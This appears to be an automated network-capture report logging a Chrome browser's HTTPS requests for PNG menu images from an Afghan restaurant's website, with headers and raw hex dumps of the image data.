                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:48 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:48 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 56 00 00 00 4b 08 06 00 00 00 ea 1e 70 b2 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRVKppHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:48 UTC8544INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:48 UTC13078INData Raw: 4d 86 e5 e5 19 ea e5 25 1c 4b 50 b7 15 eb 7b 07 98 5b 99 e6 d2 f0 9b 38 57 2e 52 be 32 c1 9b 73 73 84 ee 12 d9 9e ed ac 77 d2 6c fb 7b 1f 60 e5 0d cd f0 37 ff 14 5d be c4 dc 52 81 ae d2 0a 41 58 c2 1d bc 95 5c ac 82 aa 16 28 54 c7 58 92 0e 8b 8b b3 bc f1 ed ff 04 6d 03 dc f5 ce 9f 20 97 cc 32 3e fc 06 96 eb b3 72 65 8c e1 3f fb 02 99 b3 17 e9 dc 76 1f e9 8e 36 ce 7d e3 eb 7c f7 3f fe 26 6d eb 3a 69 cd e5 f1 63 8f d2 f3 33 ff 96 44 f7 5e ce cc cd 12 96 e7 b0 31 78 5e 23 b0 99 28 42 45 11 6e 2c 49 79 79 46 e8 28 ea af 56 ab ae d6 a6 fa 76 60 df 62 b1 7e 32 f5 96 6c c0 71 bd 96 64 36 9f 57 52 10 45 21 c2 c8 6b 3b 23 21 c0 92 8d bd 7f 50 0f 1a e0 6a 45 10 d4 a9 57 4a d4 4a 2b 84 d5 32 96 74 b0 a5 45 c2 16 18 42 a6 27 4e 13 84 15 ee d8 b9 93 e5 ca 26 a2 ca 12
                                                                                                                                                    Data Ascii: M%KP{[8W.R2sswl{`7]RAX\(TXm 2>re?v6}|?&m:ic3D^1x^#(BEn,IyyF(Vv`b~2lqd6WRE!k;#!PjEWJJ+2tEB'N&


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    74192.168.2.449839162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:48 UTC658OUTGET /assets/imgs/menu_imges/Chapli_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:48 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:48 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:12:14 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 41872
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:48 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:48 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7f 00 00 00 4b 08 06 00 00 00 59 56 58 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRKYVXpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:48 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:48 UTC16384INData Raw: c2 07 49 48 04 74 85 58 6f c7 a1 c1 de 8e 43 07 f6 8d fd 78 a5 e9 90 cf 6d 9f d9 da cc 3d b7 b1 bc fa 42 a5 5a 7f a9 56 29 e7 ac 66 83 60 28 8a 11 d4 90 c4 3f 60 f0 5f 37 a3 a5 ed 75 b4 50 a2 e7 9e 07 7e e4 e3 13 7b 0e de 65 03 85 8a 89 aa ca e8 86 42 b5 05 9e 59 e4 e2 d7 3f 0f b5 15 a2 bd bb 68 6e 6d f0 e0 b1 bd 2c 5e ca f1 b9 9f fc 4d b4 8c cc 68 3c 84 a6 18 18 5a 18 9d 06 55 4b 10 d4 7c 7a fb e2 2c 5f a9 20 6f 4d 93 ed df 4b 33 18 a3 5c 76 f0 7d 89 c1 ee 24 a9 a0 4c 54 95 89 f4 75 91 89 49 28 5e 80 c6 c9 4b c4 56 ca 2c 5d 9d e3 d2 99 97 70 ae c2 ad 37 3c c2 ee db 3f 48 24 13 a1 96 2f e3 4b 12 12 3b 60 e3 83 2f f8 36 1f 40 f8 78 62 e7 67 ae b7 73 da db 0c 51 48 12 92 90 76 c0 07 49 f2 bf c5 b9 14 48 3b 57 4a fb ed 1e ae 2b 68 b9 df 7c 6e 41 5d 21 de df
                                                                                                                                                    Data Ascii: IHtXoCxm=BZV)f`(?`_7uP~{eBY?hnm,^Mh<ZUK|z,_ oMK3\v}$LTuI(^KV,]p7<?H$/K;`/6@xbgsQHvIH;WJ+h|nA]!
                                                                                                                                                    2024-10-01 04:26:48 UTC912INData Raw: 7d 69 77 cf f8 de 4e 8d 5e bb 8e 5e 52 75 f4 40 90 50 40 42 02 ea a6 ef 2e cd af be 25 92 ec 44 56 b5 37 42 e9 9e 6d e1 fb df f9 21 8c df b5 e0 7f 9b db a8 a8 a8 46 0c 55 0a 61 d5 ca af e6 16 ae bd ba 71 f5 b5 5f 0c 26 b2 ef ca 8e ee 7d 7b d7 f0 de 87 32 fd 13 84 63 4a db 33 b0 79 e3 ae 6d 5f 0b 0e b6 db ce 8c 29 8a 4c 32 93 e0 8e 7b ef e0 4d 77 dc 8e 59 2b e0 3b 26 b2 11 c2 97 34 1c 5f c6 96 55 64 49 c2 b1 9d b6 e4 a9 ef b7 d9 b7 ef ef f4 38 ee 68 ef 88 6f 66 db da 23 5b 25 90 7d 84 a4 23 cb 12 aa 22 a1 2b 3b 85 18 c0 f5 2b 73 6f 93 71 0a 46 30 f4 46 f0 46 08 19 db f3 f0 6c fb 7b e0 ff b5 81 24 cd 20 18 8a 60 23 35 1a e5 ed 8f cd 9d fa da c7 d6 2f 3e b7 2b 31 b8 ef fd e9 81 dd ef ea 18 dc 3d 91 ea ee 24 10 94 f1 1c 19 df f6 db 77 ef 8e f4 b7 67 b9 38 80
                                                                                                                                                    Data Ascii: }iwN^^Ru@P@B.%DV7Bm!FUaq_&}{2cJ3ym_)L2{MwY+;&4_UdI8hof#[%}#"+;+soqF0FFl{$ `#5/>+1=$wg8


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    75192.168.2.449840162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:48 UTC656OUTGET /assets/imgs/menu_imges/Lamb_Karae.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:48 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:48 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:32:48 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38154
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:48 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:48 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 74 00 00 00 4b 08 06 00 00 00 a1 b6 a3 5f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRtK_pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:48 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:48 UTC5738INData Raw: 98 68 6d 73 e0 f6 29 96 b7 07 1c 8b 7d 6e be f7 6e e6 83 39 3e f6 91 3f e0 c2 d2 02 b1 b1 b9 61 52 50 2d 08 ca 63 55 84 ad 78 89 1d ae 6c ae 53 5e f5 b9 79 f7 14 61 6f 9b 4f 7c f0 3c 65 7b 84 d9 c9 29 f2 29 cd f2 72 c8 b9 c5 1e 7b a7 03 bc 42 80 2b 0e 10 9c f9 25 c4 a9 2d 9a f5 7d 5c 7d cf bd c8 67 3f c1 e6 3f fd 45 c6 57 da 58 79 cc 46 e2 13 e5 31 87 0f 1f a0 be eb 2a b6 bb 15 64 61 8e 76 f7 39 ac a0 40 c9 b5 49 30 44 79 8e 90 0a 5b e4 08 9d e1 0a 43 8a 18 56 d9 d2 04 cf 2f f3 d1 3f fe 18 3b cd 06 c2 b6 10 52 d0 e9 f6 28 7a 0e 9b dd 36 e4 19 77 bd ee 41 a6 77 1f dc 48 9b 9b ef 2b 5a 1e ca 29 31 75 cd ed 64 49 c2 4e 73 07 21 0c 6e e0 a3 fb 7d b4 d1 5f d5 70 17 00 c5 a0 78 aa 5c 28 f6 ba ad 0e 12 70 2c 8b 38 4e d1 b9 60 a2 52 c4 68 c1 f9 73 27 d1 51 8b e9
                                                                                                                                                    Data Ascii: hms)}nn9>?aRP-cUxlS^yaoO|<e{))r{B+%-}\}g??EWXyF1*dav9@I0Dy[CV/?;R(z6wAwH+Z)1udINs!n}_px\(p,8N`Rhs'Q


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    76192.168.2.449842162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:48 UTC400OUTGET /assets/imgs/menu_imges/Tikka_Shish_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:48 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:48 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:01:32 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38907
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:48 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:48 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5f 00 00 00 4a 08 06 00 00 00 dd 57 88 dd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDR_JWpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:48 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:48 UTC6491INData Raw: 49 b9 28 c9 e6 8a bc 74 3a e6 99 af 6c 70 cf 1d 43 90 09 31 1f 9c 63 e6 91 bd 5c ff fc 2b 84 9f bd c2 da b9 00 bb e8 b2 75 cf 34 cb 3d c9 dd 7e c2 bd 13 39 7a 7e 8a df 0d 30 8a 39 2e 5d eb d0 df 69 30 94 0d 30 e8 b3 d2 34 71 94 66 bb 1f 93 9b ad f1 c0 dd a3 98 b1 cb 76 2b e1 fa e5 6d ca 05 83 5b ee 3c 8e 29 6b 78 c5 61 36 bb db fc d1 1f fe 31 4b 6b 6d b2 a9 cf 0f ff d8 77 f1 03 3f f3 ab 44 b1 66 73 65 81 5c 71 08 c7 31 d0 4a 21 a5 89 eb 3a 04 81 cf ab 67 cf 7c 77 9a a6 bf 75 f1 ec 29 56 16 2f 33 34 b9 87 34 f4 d1 61 97 6c b6 48 6d 7a 16 cb 29 60 82 f5 ad 86 11 55 94 92 95 ac 97 1f da de de ac ac ad 2c 8f 54 aa e3 63 d9 82 e9 8e 1c 3a 30 bc d1 de b8 65 e3 cc 8b c5 f9 5b a6 49 63 87 17 4f 6e 10 06 16 8e 35 58 62 d7 b7 8b 14 3c 0f c3 35 b9 de 0e b1 a5 a6 3a
                                                                                                                                                    Data Ascii: I(t:lpC1c\+u4=~9z~09.]i004qfv+m[<)kxa61Kkmw?Dfse\q1J!:g|wu)V/344alHmz)`U,Tc:0e[IcOn5Xb<5:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    77192.168.2.449843162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:48 UTC659OUTGET /assets/imgs/menu_imges/Chicken_Karae.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 19:30:00 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39813
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 71 00 00 00 4b 08 06 00 00 00 47 9f 68 1b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRqKGhpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC15237INData Raw: 0d 06 0c 86 03 fc c0 45 0a 49 29 94 c4 49 ce e6 76 87 38 89 11 68 24 82 30 f0 69 d6 ab 4c 4f d4 28 84 01 9e eb a0 85 44 0a 89 94 72 3c 2c 91 e0 fb 8a 5a b9 c4 44 b3 46 bd 5e 07 e9 d2 da da 66 a7 db 67 a7 d7 61 38 18 31 8a 07 58 a3 c7 73 3a e9 90 6a c8 87 29 cd 46 15 d7 f3 d9 e9 8e 88 8d c0 53 0a 65 60 30 1c 32 4a 72 46 71 cc cc 44 0d c7 f3 30 ca 45 a3 18 0d fb 04 45 83 17 94 28 17 5c 7c 3f 20 31 06 6b c0 e8 94 6e 7b 93 42 18 e0 97 3c d9 f5 ea ef b2 4e f3 5d 4e bc f5 cb 05 51 fa 2f cb 42 6f 64 7f 6a 20 0a 50 58 d0 b1 ca b2 f8 f8 76 e6 9e cb 54 f0 94 5f 9d 78 47 58 99 39 a0 1a d3 cc 85 01 b9 b5 24 c3 1e bd ad 55 36 96 6f 72 eb c6 25 d6 97 57 c8 92 18 2b 2d 4a 80 b4 96 34 8e 89 07 82 53 c7 f6 51 09 a7 f8 dc f3 97 c9 b5 20 f4 5d ac b0 a4 99 a6 dd 1b b1 b2 b9
                                                                                                                                                    Data Ascii: EI)Iv8h$0iLO(Dr<,ZDF^fga81Xs:j)FSe`02JrFqD0EE(\|? 1kn{B<N]NQ/Bodj PXvT_xGX9$U6or%W+-J4SQ ]


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
